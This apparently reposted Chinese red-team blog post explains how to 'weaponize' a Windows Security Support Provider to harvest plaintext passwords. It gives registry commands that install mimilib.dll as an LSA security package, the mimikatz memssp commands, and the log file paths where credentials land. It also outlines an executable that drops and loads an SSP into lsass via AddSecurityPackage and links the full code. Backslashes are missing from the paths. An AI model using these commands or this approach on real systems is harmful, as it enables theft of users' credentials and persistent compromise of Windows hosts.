SSP武器化

 在C1Y2M3师傅看到的思路，师傅没有给出完整代码，这里来复现一下。

关于SSP的利用网上已经有很多的文章了，在16年左右三好学生师傅就已经对其有过详细的阐述，这里就不赘述了，或者可以来看snowming的文章(http://blog.leanote.com/post/snowming/ebdd89a8e83c)。都是基于注册表项来进行操作：

copy mimilib.dll %systemroot%system32
reg query hklmsystemcurrentcontrolsetcontrollsa /v "Security Packages"
reg add "hklmsystemcurrentcontrolsetcontrollsa" /v "Security Packages" /d "kerberosmsv1_0schannelwdigesttspkgpku2umimilib" /t REG_MULTI_SZ

文件位置：

 C:Windowssystem32kiwissp.log

或者纯内存操作：

privilege::debug
misc::memssp

文件位置：

C:Windowssystem32mimilsa.log

而按照C1Y2M3师傅的思路就是

将动态库或是驱动文件打包进一个可执行文件中，再由需要使用的时候，再临时释放和加载。
通过调用 AddSecurityPackage API函数可以使 lsass.exe 进程加载指定的SSP / AP，无需重启

有了思路，我们就是来复现了。

编译环境：VS2015

首先新建一个控制台项目，然后，右键资源，新建资源

选择自定义，然后随意命名之后，添加我们的资源。

此时可以在自动添加的“resource.h”头文件中看到我们的资源ID宏；

剩下的就是编写我们的代码了，代码的话我已经上传至了GitHub：https://github.com/lengjibo/RedTeamTools/tree/master/windows/CredSSP

大家看一下就可以明白了。

然后管理员权限运行，就可以抓到明文密码了。

当然也可以利用c1y2m3师傅所说的，与HTTP.SYS进行结合。这里就不演示了。

参考文章：

https://c1y2m3.github.io/c1y2m3.github.io/2020/06/15/SSP/

http://www.mamicode.com/info-detail-2638519.html
https://www.4hou.com/posts/y6jW
https://blog.csdn.net/ayang1986/article/details/83351842

本文始发于微信公众号（鸿鹄实验室）：SSP武器化